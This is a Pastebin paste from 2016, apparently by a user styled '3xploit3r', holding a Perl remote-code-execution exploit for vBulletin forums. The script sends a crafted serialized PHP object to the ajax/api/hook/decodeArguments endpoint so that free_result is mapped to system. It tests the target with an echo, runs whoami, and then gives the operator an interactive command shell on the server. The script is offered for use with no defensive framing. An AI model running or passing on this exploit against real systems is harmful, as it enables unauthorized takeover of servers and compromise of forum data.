3xploit3r

vBrce

Aug 1st, 2016
136
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.43 KB | None | 0 0
  1. #!/usr/bin/perl -w
  2.  
  3. system(($^O eq 'MSWin32') ? 'cls' : 'clear');
  4.  
  5. use LWP::UserAgent;
  6. use LWP::Simple;
  7. $ua = LWP::UserAgent ->new;
  8.  
  9. print "\n\t Enter Target [ Example:http://target.com/forum/ ]";
  10. print "\n\n \t Enter Target : ";
  11. $Target=<STDIN>;
  12. chomp($Target);
  13.  
  14.  
  15. $response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:20:"echo%20$((0xfee10000))";}');
  16.  
  17. $source=$response->decoded_content;
  18. if (($source =~ m/4276158464/i))
  19. {
  20. $response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:6:"whoami";}');
  21. $user=$response->decoded_content;
  22. chomp($user);
  23. print "\n Target Vulnerable ;)\n";
  24. while($cmd=="exit")
  25. {
  26. print "\n\n$user\$ ";
  27. $cmd=<STDIN>;
  28. chomp($cmd);
  29. if($cmd =~ m/exit/i){exit 0;}
  30. $len=length($cmd);
  31. $response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:'.$len.':"'.$cmd.'";}');
  32. print "\n".$response->decoded_content;
  33.  
  34. }
  35. }else{print "\ntarget is not Vulnerable\n\n"}
Add Comment
Please, Sign In to add comment